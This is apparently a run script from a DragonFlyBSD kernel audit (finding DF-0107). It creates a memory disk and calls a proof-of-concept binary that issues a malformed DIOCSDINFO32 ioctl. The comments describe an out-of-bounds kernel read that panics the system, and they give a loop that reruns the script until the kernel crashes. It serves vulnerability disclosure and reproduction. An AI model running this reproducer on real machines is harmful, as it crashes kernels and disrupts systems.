DragonFlyBSD Kernel Audit
DF-0107 / run.sh
← back to finding ↓ download raw
#!/bin/sh
# DF-0107 run script (run on the DragonFly guest AS ROOT -- vnconfig and opening
# /dev/vn0s0 O_RDWR both require root or the operator group; maxx is NOT in
# operator, matching the finding's threat model of root/operator-only access).
#
# Creates an 8 MiB memory disk (vn0), then issues DIOCSDINFO32 with
# d_npartitions=0xFFFF.  The kernel runs dkcksum32() over the ioctl label
# buffer (a 404-byte kmalloc), walking ~1 MiB out of bounds.  When the walk
# crosses a thread-stack guard page the kernel faults:
#
#   panic: vm_fault: fault on stack guard, addr: 0xffff...
#   l32_setdisklabel() at l32_setdisklabel+0x57
#   dsioctl() at dsioctl+0x721
#
# The panic is heap-layout dependent (probabilistic).  On a freshly booted guest
# it typically fires within the first few invocations; on a churned heap it may
# take more.  Re-run until panic, e.g.:
#   for i in $(seq 1 30); do sh run.sh && break; sleep 1; done
set -e
cd "$(dirname "$0")"

# one-time setup of the memory disk
rm -f /tmp/oob.img
dd if=/dev/zero of=/tmp/oob.img bs=1m count=8 >/dev/null 2>&1
vnconfig -c vn0 /tmp/oob.img >/dev/null 2>&1 || true
test -e /dev/vn0s0 || { echo "vn0s0 did not appear"; exit 1; }

echo "[*] issuing DIOCSDINFO32 with d_npartitions=0xFFFF on /dev/vn0s0"
./poc_diocsdinfo /dev/vn0s0
echo "[*] ioctl returned without panic (try again -- panic is probabilistic)"